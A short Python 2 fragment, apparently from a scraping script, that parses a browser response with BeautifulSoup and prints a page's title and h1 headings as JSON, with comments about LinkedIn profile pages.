# Parse the response with BeautifulSoup
soup = BS(br.response().read(), 'lxml')
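# The json import above is otherwise unused; a hedged follow-up showing one way the
# parsed page might be used.  Only generic tags are touched here, because LinkedIn's
# markup changes frequently and public profiles are often hidden from anonymous clients:
profile = {
    'title': soup.title.string if soup.title else None,
    'headings': [h.get_text(strip=True) for h in soup.find_all('h1')],
}
print json.dumps(profile, indent=2)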